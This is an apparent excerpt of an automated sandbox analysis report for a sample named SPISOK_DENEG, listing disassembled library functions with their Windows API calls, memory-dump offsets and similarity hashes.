                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: c00582e57ea36549f75520af2e4184d3da910e1427aabf3f8b663ccc8e5954a6
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: 0001D67220030D6BE331CF65D886DBAFBE9FB85370F25052DE69483682EA30A905C764
                                                            Function 000FB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000F9813,00000001,00000364,?,000F3F73,00000050,?,00111030,00000200), ref: 000FB177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 08baac2ea3bb6a4633b49794bba1c59cc4de785936d3cc380302b12c4834bd24
                                                            • Instruction ID: a98d5a63cf6542020bd1a1c9d0dd52fb60e12ba1e624efff8f70ed3ac79127ee
                                                            • Opcode Fuzzy Hash: 08baac2ea3bb6a4633b49794bba1c59cc4de785936d3cc380302b12c4834bd24
                                                            • Instruction Fuzzy Hash: 56F0B43250512CB7DB715A21EC2ABBF3788BF81760B5C8221FE0896991CB30D901AAE0
                                                            Function 000F3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 000F3C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: a54ddbb5b33aaccb8bcbd683cf960b6e1caded1f08ad1dc863e4f2003c756cbd
                                                            • Instruction ID: c76fa37ccd289ac8c841ce49a2a60f9e72fb5f758128f9294d56cd21965f9346
                                                            • Opcode Fuzzy Hash: a54ddbb5b33aaccb8bcbd683cf960b6e1caded1f08ad1dc863e4f2003c756cbd
                                                            • Instruction Fuzzy Hash: 13F0E53220021E9FCF559EA8EC109AA77E9EF41B307144125FB15E7990DB31EA20E7D0
                                                            Function 000F8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 65db2d2613c9afe2b894a585d861071fb2c3171f8cc488f9d5a2b3c43301bfae
                                                            • Instruction ID: 06244df4ed4b00d9b879f03f2658c7e08e10a63ea4376f9226a8783307352cff
                                                            • Opcode Fuzzy Hash: 65db2d2613c9afe2b894a585d861071fb2c3171f8cc488f9d5a2b3c43301bfae
                                                            • Instruction Fuzzy Hash: 43E06D3560622D67EAB166659D09BFF768C9F817A4F158121AE5896C92CF60CC00B3E1
                                                            Function 000D5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D5AC2
                                                              • Part of subcall function 000DB505: __EH_prolog.LIBCMT ref: 000DB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 235270631d169710dd4ed23df9d26f98f5103d3b543b45f5b4f85b9751e61e3d
                                                            • Instruction ID: 061bf618ac0b80c3479641e96ec77d567e95fc1e220fd3e640c81cc3fde47f52
                                                            • Opcode Fuzzy Hash: 235270631d169710dd4ed23df9d26f98f5103d3b543b45f5b4f85b9751e61e3d
                                                            • Instruction Fuzzy Hash: 1F018C308107D4DED725E7B8C0457DDFBA49FA4304F50848EA45663283CBF81B08D7A2
                                                            Function 000DA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6C4
                                                              • Part of subcall function 000DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6F2
                                                              • Part of subcall function 000DA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000DA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: b3930abbcdf214be1efdcd81868758880eb94b3d195e78463d6f3d60c3696928
                                                            • Instruction ID: 1bc34807cb667f9a380fd7607475121f2207987722f1840e3a63477143182eba
                                                            • Opcode Fuzzy Hash: b3930abbcdf214be1efdcd81868758880eb94b3d195e78463d6f3d60c3696928
                                                            • Instruction Fuzzy Hash: A9F05E32009790AACA6257B89904BDB7B906F1B331F048A4AF1F95229AC27550949B33
                                                            Function 000E0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 000E0E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: 2a2387529ddc47929038f6482d0bdd843c76528535354a7affe12bd90636bc1c
                                                            • Instruction ID: 5073ff685f1823c418efea79c4cc5fb36d0529ffae42758f7a83dccab3ff2c85
                                                            • Opcode Fuzzy Hash: 2a2387529ddc47929038f6482d0bdd843c76528535354a7affe12bd90636bc1c
                                                            • Instruction Fuzzy Hash: DAD0C221A111D46EDA15332A29157FE254B8FCB310F0D0036B14977783CBA908C2A271
                                                            Function 000EA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 000EA62C
                                                              • Part of subcall function 000EA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000EA3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: 2303e7daec2e2031c5cd3b912d0df85955b97fd97259e67066866096cdabf6fe
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: DFD0C77131024DBEDF516B73CC129AF7595FB0A340F048125B851E5152EAB1ED109562
                                                            Function 000EDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,000E1B3E), ref: 000EDD92
                                                              • Part of subcall function 000EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EB579
                                                              • Part of subcall function 000EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB58A
                                                              • Part of subcall function 000EB568: IsDialogMessageW.USER32(00010480,?), ref: 000EB59E
                                                              • Part of subcall function 000EB568: TranslateMessage.USER32(?), ref: 000EB5AC
                                                              • Part of subcall function 000EB568: DispatchMessageW.USER32(?), ref: 000EB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: eacbc8663a4c7c6bf5c0548c714424de14c58c3b5f824502a7ed3dc627696e69
                                                            • Instruction ID: 29c50d6ee49c12f347b6f7eb55ef15a7adb684cba568c2edc1ccb80a84036676
                                                            • Opcode Fuzzy Hash: eacbc8663a4c7c6bf5c0548c714424de14c58c3b5f824502a7ed3dc627696e69
                                                            • Instruction Fuzzy Hash: 41D09E32144340BED6022B52DE06F4B7AE2AB88B05F404554B384744B2CAB29D61EB15
                                                            Function 000EE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 000EE5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: 76546145c8c809ed584df79f6a788235751b73d1f597445ecacb76ab1885d24d
                                                            • Instruction ID: 60c7ad8c916d19d7c032b53d241f3fdcdda431c719496fa33eefb13fd4245315
                                                            • Opcode Fuzzy Hash: 76546145c8c809ed584df79f6a788235751b73d1f597445ecacb76ab1885d24d
                                                            • Instruction Fuzzy Hash: 91D012B01C06D8AFD755EBAAD94A7593395B324B46F901101F18DF18A2DBA445C0CA25
                                                            Function 000D98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,000D97BE), ref: 000D98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: 30ddede7bdb1a01e2a3ef2509cb1a33bbf3c06c91e1cc32a8c482915a7d44e80
                                                            • Instruction ID: 9de893725cd3a5055dc7cbccf2302a83c457ca7824b9a0c427666a8ad0293c7d
                                                            • Opcode Fuzzy Hash: 30ddede7bdb1a01e2a3ef2509cb1a33bbf3c06c91e1cc32a8c482915a7d44e80
                                                            • Instruction Fuzzy Hash: 07C0123440030585CE60462498440957351AB537657B88695D068851E1C722CC87FB30
                                                            Function 000EE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8b86d6b4a11227ff7e2524f6164e6cf27ba4d32105fa2d1cdf0ec7fb7cb4021d
                                                            • Instruction ID: 13403987b89ed659161b1c3a5ed5a3699c5c81f4c4ba2679f6cdb2cb4678042c
                                                            • Opcode Fuzzy Hash: 8b86d6b4a11227ff7e2524f6164e6cf27ba4d32105fa2d1cdf0ec7fb7cb4021d
                                                            • Instruction Fuzzy Hash: E6B092A92581C4ACA10812469E12C3B010CC281B21320852ABC15E0481AA80AC441871
                                                            Function 000EE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d5fc38e2326ba0ccc9fb355b66dbeb0efff40402dbc4e4cf676eab45b6e086ce
                                                            • Instruction ID: ae80443911c9e0f97c5919dfc83231ddef08b30d59205393c8b37d3278656cc7
                                                            • Opcode Fuzzy Hash: d5fc38e2326ba0ccc9fb355b66dbeb0efff40402dbc4e4cf676eab45b6e086ce
                                                            • Instruction Fuzzy Hash: 13B012F935C1C8ACF108524B9E02C3B010CC2C0B21330813EFC19E00C1EF806C441D71
                                                            Function 000EE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 822250cddeddb5d494830e91f521f4c8c852d140b4bc14429a283e69c02af6a2
                                                            • Instruction ID: ae205f91ba3f11fcf73a96aeb683e5ea4a854f3c5dd316592ee43a2d18a7591d
                                                            • Opcode Fuzzy Hash: 822250cddeddb5d494830e91f521f4c8c852d140b4bc14429a283e69c02af6a2
                                                            • Instruction Fuzzy Hash: A5B092A52580C4ACB10852069E02C3A010CC281B11320C12AB819E01C1AA80A8480871
                                                            Function 000EE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a5e8a9eaf1fc864c763bfcce6ca42e1f76f320b1eb5ce50b164ef370f7bc16d3
                                                            • Instruction ID: 32f8c21b46cca4cdb512be91a2c98de592ac452287ca7e8ca85a2e5c250a7a42
                                                            • Opcode Fuzzy Hash: a5e8a9eaf1fc864c763bfcce6ca42e1f76f320b1eb5ce50b164ef370f7bc16d3
                                                            • Instruction Fuzzy Hash: 08B092A52580C4ACB10852079E02C3A010CC280B11320812AB819E01C1AE9069891871
                                                            Function 000EE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
